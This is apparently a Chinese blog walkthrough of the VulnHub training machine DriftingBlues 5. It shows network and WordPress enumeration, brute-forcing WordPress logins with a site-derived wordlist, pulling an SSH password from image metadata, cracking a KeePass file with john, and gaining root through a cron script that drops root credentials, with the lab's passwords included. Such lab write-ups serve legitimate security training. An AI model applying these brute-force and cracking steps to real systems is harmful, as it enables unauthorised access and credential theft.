Vulnhub之DriftingBlues 5靶机详细测试过程(得到root shell)

DriftingBlues 5

靶机信息

名称: DriftingBlues: 5

地址:

https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova

识别IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:a6:7d:47      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.128  08:00:27:12:bf:76      1      60  PCS Systemtechnik GmbH                     

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.128 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-19 02:50 EDT
Nmap scan report for 192.168.56.128
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:12:BF:76 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NMAP扫描结果表明目标主机有2个开放端口:22(SSH),80(HTTP)

Get Foothold

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ curl http://192.168.56.128/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.128 Port 80</address>
</body></html>

目标主机没有robots.txt文件。

──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ nikto -h http://192.168.56.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.128
+ Target Hostname:    192.168.56.128
+ Target Port:        80
+ Start Time:         2023-05-19 02:53:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.128/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-05-19 02:54:42 (GMT-4) (65 seconds)

nikto工具运行结果表明目标主机运行wordpress,在尝试扫描wordpress用户名和插件之间,看有无其他的目录:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ gobuster dir -u http://192.168.56.128 -oN nmap_full_scan -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.bak,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.128
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              bak,txt,php,html,js
[+] Timeout:                 10s
===============================================================
2023/05/19 02:56:08 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.56.128/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.128/wp-content/]
/license.txt          (Status: 200) [Size: 19915]
/wp-login.php         (Status: 200) [Size: 6675]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.128/wp-includes/]
/readme.html          (Status: 200) [Size: 7278]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.128/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.128/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 279]
Progress: 1322241 / 1323366 (99.91%)
===============================================================
2023/05/19 03:00:52 Finished
===============================================================

gobuster工具没有扫描出更有用的的目录或者文件。

─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -e u,p
[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.128/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

wpscan工具扫描出用户名,(备注:没有扫描出有漏洞的插件)

─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -U abuzerkomurcu -P /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

用经典的rockyou.txt字典没有破解出来,考虑到目标主机页面内容较多,是否密码存在页面中,因此用cewl工具生成字典:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ cewl -d 3 http://192.168.56.128 -w dict 
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -U users.dict -P dict
[!] Valid Combinations Found:
 | Username: gill, Password: interchangeable

但是只有gill的密码被破解出来,利用该密码登录,发现gill并不是管理员用户,在媒体中发现了一张图片,这张图片并没有出现在前端页面中,比较可疑,将其下载到Kali Linux本地。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ exiftool dblogo.png 
ExifTool Version Number         : 12.44
File Name                       : dblogo.png
Directory                       : .
File Size                       : 19 kB
File Modification Date/Time     : 2023:05:19 03:31:44-04:00
File Access Date/Time           : 2023:05:19 03:31:44-04:00
File Inode Change Date/Time     : 2023:05:19 03:31:44-04:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 300
Image Height                    : 300
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Gamma                           : 2.2
Pixels Per Unit X               : 2835
Pixels Per Unit Y               : 2835
Pixel Units                     : meters
XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Create Date                     : 2021:02:24 02:55:28+03:00
Metadata Date                   : 2021:02:24 02:55:28+03:00
Modify Date                     : 2021:02:24 02:55:28+03:00
Instance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID                     : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode                      : RGB
ICC Profile Name                : sRGB IEC61966-2.1
Format                          : image/png
History Action                  : created, saved
History Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /
Text Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size                      : 300x300
Megapixels                      : 0.090

利用exiftool工具得到了ssh密码,利用该密码登录其SSH:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ ssh gill@192.168.56.128
The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:35: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
gill@192.168.56.128's password: 
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gill@driftingblues:~$ id
uid=1000(gill) gid=1000(gill) groups=1000(gill)
gill@driftingblues:~$ ls -alh
total 24K
drwxr-xr-x 4 gill gill 4.0K May 19 02:33 .
drwxr-xr-x 4 root root 4.0K Feb 24  2021 ..
drwx------ 3 gill gill 4.0K May 19 02:33 .gnupg
-rwx------ 1 gill gill 2.0K Feb 24  2021 keyfile.kdbx
drwx------ 2 gill gill 4.0K Feb 24  2021 .ssh
-r-x------ 1 gill gill 1.8K Jan  3  2021 user.txt
gill@driftingblues:~$ cat user.txt 
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█



gill@driftingblues:~$ 

Privilege Escalation

在gill家目录中有文件keyfile.kdbx,肯定非常有用,将其下载到Kali Linux。

通过KeePass密码安全创建的数据文件称为KDBX文件,它们通常所说的KeePass的密码数据库。这些文件包含密码的加密数据库,其中如果用户设置一个主密码,并通过主密码访问他们,他们只能查看。当涉及到的电子邮件帐户的个人登录凭据,电子商务网站,视窗,FTP站点和其他目的的安全存储KDBX文件是很有用的。
──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wget http://192.168.56.128:8000/keyfile.kdbx            
--2023-05-19 03:36:26--  http://192.168.56.128:8000/keyfile.kdbx
Connecting to 192.168.56.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2030 (2.0K) [application/octet-stream]
Saving to: ‘keyfile.kdbx’

keyfile.kdbx                            100%[============================================================================>]   1.98K  --.-KB/s    in 0s      

2023-05-19 03:36:26 (217 MB/s) - ‘keyfile.kdbx’ saved [2030/2030]


┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ keepass2john keyfile.kdbx > keyfile_hash

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt keyfile_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre       (keyfile)     
1g 0:00:01:23 DONE (2023-05-19 03:38) 0.01196g/s 82.44p/s 82.44c/s 82.44C/s winston1..palomita
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

用得到的密码到下面的网站破解文件:

https://app.keeweb.info/

得到5个类似于密码的字符串,但是并不是root密码

2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde
ill@driftingblues:/tmp$ wget http://192.168.56.230:8000/pspy64
--2023-05-19 02:45:48--  http://192.168.56.230:8000/pspy64
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                  100%[============================================================================>]   2.96M  --.-KB/s    in 0.03s   

2023-05-19 02:45:48 (102 MB/s) - ‘pspy64’ saved [3104768/3104768]

gill@driftingblues:/tmp$ chmod +x pspy64
gill@driftingblues:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/05/19 02:46:01 CMD: UID=0     PID=1694   | /bin/bash /root/key.sh 
2023/05/19 02:46:01 CMD: UID=0     PID=1693   | /bin/sh -c /root/key.sh 
2023/05/19 02:46:01 CMD: UID=0     PID=1692   | /usr/sbin/CRON -f 
2023/05/19 02:46:01 CMD: UID=1000  PID=1685   | ./pspy64 
2023/05/19 02:46:01 CMD: UID=0     PID=1665   | 
2023/05/19 02:46:01 CMD: UID=0     PID=1585   | 
2023/05/19 02:46:01 CMD: UID=1000  PID=1545   | -bash 
2023/05/19 02:46:01 CMD: UID=1000  PID=1544   | sshd: gill@pts/0     
2023/05/19 02:46:01 CMD: UID=1000  PID=1531   | (sd-pam) 
2023/05/19 02:46:01 CMD: UID=1000  PID=1530   | /lib/systemd/systemd --user 
2023/05/19 02:46:01 CMD: UID=0     PID=1527   | sshd: gill [priv]    
2023/05/19 02:46:01 CMD: UID=33    PID=1238   | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=1202   | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=1027   | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=0     PID=949    | 
2023/05/19 02:46:01 CMD: UID=33    PID=846    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=806    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=805    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=777    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=743    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=541    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=540    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=0     PID=524    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=0     PID=492    | /usr/sbin/sshd -D 
2023/05/19 02:46:01 CMD: UID=106   PID=488    | /usr/sbin/mysqld 
2023/05/19 02:46:01 CMD: UID=0     PID=409    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2023/05/19 02:46:01 CMD: UID=0     PID=384    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                                                                                         
2023/05/19 02:46:01 CMD: UID=104   PID=354    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2023/05/19 02:46:01 CMD: UID=0     PID=353    | /lib/systemd/systemd-logind 
2023/05/19 02:46:01 CMD: UID=0     PID=352    | /usr/sbin/cron -f 
2023/05/19 02:46:01 CMD: UID=0     PID=347    | /usr/sbin/rsyslogd -n -iNONE 
2023/05/19 02:46:01 CMD: UID=101   PID=341    | /lib/systemd/systemd-timesyncd 
2023/05/19 02:46:01 CMD: UID=0     PID=328    | 
2023/05/19 02:46:01 CMD: UID=0     PID=327    | 
2023/05/19 02:46:01 CMD: UID=0     PID=326    | 
2023/05/19 02:46:01 CMD: UID=0     PID=325    | 
2023/05/19 02:46:01 CMD: UID=0     PID=321    | 
2023/05/19 02:46:01 CMD: UID=0     PID=320    | 
2023/05/19 02:46:01 CMD: UID=0     PID=275    | 
2023/05/19 02:46:01 CMD: UID=0     PID=274    | 
2023/05/19 02:46:01 CMD: UID=0     PID=237    | /lib/systemd/systemd-udevd 
2023/05/19 02:46:01 CMD: UID=0     PID=215    | /lib/systemd/systemd-journald 
2023/05/19 02:46:01 CMD: UID=0     PID=187    | 
2023/05/19 02:46:01 CMD: UID=0     PID=186    | 
2023/05/19 02:46:01 CMD: UID=0     PID=184    | 
2023/05/19 02:46:01 CMD: UID=0     PID=153    | 
2023/05/19 02:46:01 CMD: UID=0     PID=117    | 
2023/05/19 02:46:01 CMD: UID=0     PID=116    | 
2023/05/19 02:46:01 CMD: UID=0     PID=114    | 
2023/05/19 02:46:01 CMD: UID=0     PID=113    | 
2023/05/19 02:46:01 CMD: UID=0     PID=111    | 
2023/05/19 02:46:01 CMD: UID=0     PID=110    | 
2023/05/19 02:46:01 CMD: UID=0     PID=108    | 
2023/05/19 02:46:01 CMD: UID=0     PID=106    | 
2023/05/19 02:46:01 CMD: UID=0     PID=59     | 
2023/05/19 02:46:01 CMD: UID=0     PID=50     | 
2023/05/19 02:46:01 CMD: UID=0     PID=49     | 
2023/05/19 02:46:01 CMD: UID=0     PID=48     | 
2023/05/19 02:46:01 CMD: UID=0     PID=30     | 
2023/05/19 02:46:01 CMD: UID=0     PID=29     | 
2023/05/19 02:46:01 CMD: UID=0     PID=28     | 
2023/05/19 02:46:01 CMD: UID=0     PID=27     | 
2023/05/19 02:46:01 CMD: UID=0     PID=26     | 
2023/05/19 02:46:01 CMD: UID=0     PID=25     | 
2023/05/19 02:46:01 CMD: UID=0     PID=24     | 
2023/05/19 02:46:01 CMD: UID=0     PID=23     | 
2023/05/19 02:46:01 CMD: UID=0     PID=22     | 
2023/05/19 02:46:01 CMD: UID=0     PID=21     | 
2023/05/19 02:46:01 CMD: UID=0     PID=20     | 
2023/05/19 02:46:01 CMD: UID=0     PID=19     | 
2023/05/19 02:46:01 CMD: UID=0     PID=18     | 
2023/05/19 02:46:01 CMD: UID=0     PID=17     | 
2023/05/19 02:46:01 CMD: UID=0     PID=16     | 
2023/05/19 02:46:01 CMD: UID=0     PID=15     | 
2023/05/19 02:46:01 CMD: UID=0     PID=14     | 
2023/05/19 02:46:01 CMD: UID=0     PID=12     | 
2023/05/19 02:46:01 CMD: UID=0     PID=11     | 
2023/05/19 02:46:01 CMD: UID=0     PID=10     | 
2023/05/19 02:46:01 CMD: UID=0     PID=9      | 
2023/05/19 02:46:01 CMD: UID=0     PID=8      | 
2023/05/19 02:46:01 CMD: UID=0     PID=6      | 
2023/05/19 02:46:01 CMD: UID=0     PID=4      | 
2023/05/19 02:46:01 CMD: UID=0     PID=3      | 
2023/05/19 02:46:01 CMD: UID=0     PID=2      | 
2023/05/19 02:46:01 CMD: UID=0     PID=1      | /sbin/init 
2023/05/19 02:46:01 CMD: UID=0     PID=1696   | /bin/bash /root/key.sh 

将pyps64工具上传目标主机,发现有个进程会被每分钟执行一次:

2023/05/19 02:46:01 CMD: UID=0     PID=1693   | /bin/sh -c /root/key.sh

而根目录下有/keyfolder,从/root/key.sh脚本的名字看出应该是跟密码有关,而/keyfolder为密码目录,但是当前该目录下什么都没有,因此将前面破解得到的类似于密码的字符串作为文件名创建文件,但是然后看该目录下有无变化,而且需要删掉创建的文件,说实话,这个漏洞太难发现了,也是参考别人的做法。

gill@driftingblues:/keyfolder$ cd /tmp
gill@driftingblues:/tmp$ touch 2real4surreal
gill@driftingblues:/tmp$ mv 2real4surreal /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/*
-rw-r--r-- 1 gill gill 0 May 19 03:01 /keyfolder/2real4surreal
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/buddyretard
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/closet313
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/exalted
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/fracturedocean
-rw-r--r-- 1 gill gill 0 May 19 02:56 /keyfolder/zakkwylde
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:01 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:01 2real4surreal
-rw-r--r--  1 gill gill    0 May 19 02:55 buddyretard
-rw-r--r--  1 gill gill    0 May 19 02:55 closet313
-rw-r--r--  1 gill gill    0 May 19 02:55 exalted
-rw-r--r--  1 gill gill    0 May 19 02:55 fracturedocean
-rw-r--r--  1 gill gill    0 May 19 02:56 zakkwylde
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch buddyretard
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:02 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
gill@driftingblues:/tmp$ mv buddyretard /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:03 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:02 buddyretard
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch closet313
gill@driftingblues:/tmp$ mv closet313 /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:03 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:03 closet313
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch exalted
gill@driftingblues:/tmp$ mv exalted /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:04 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:03 exalted
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch fracturedocean
gill@driftingblues:/tmp$ mv fracturedocean /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:04 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:04 fracturedocean
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 12K
drwx---rwx  2 root root 4.0K May 19 03:05 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:04 fracturedocean
-rw-r--r--  1 root root   29 May 19 03:05 rootcreds.txt
gill@driftingblues:/tmp$ cat /keyfolder/rootcreds.txt 
root creds

imjustdrifting31
gill@driftingblues:/tmp$ 
gill@driftingblues:/tmp$ su - root
Password: 
root@driftingblues:~# id
uid=0(root) gid=0(root) groups=0(root)
root@driftingblues:~# cd /root
root@driftingblues:~# ls -alh
total 20K
drwx------  2 root root 4.0K Mar  8  2021 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-------  1 root root   45 Mar  8  2021 .bash_history
-rwx------  1 root root  205 Feb 24  2021 key.sh
-r-x------  1 root root 1.8K Dec 17  2020 root.txt
root@driftingblues:~# cat root.txt 
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@driftingblues:~# cat key.sh 
#!/bin/bash

if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
        echo "root creds" >> /keyfolder/rootcreds.txt
        echo "" >> /keyfolder/rootcreds.txt
        echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
root@driftingblues:~# 
posted @ 2023-05-19 16:21  Jason_huawen  阅读(161)  评论(0编辑  收藏  举报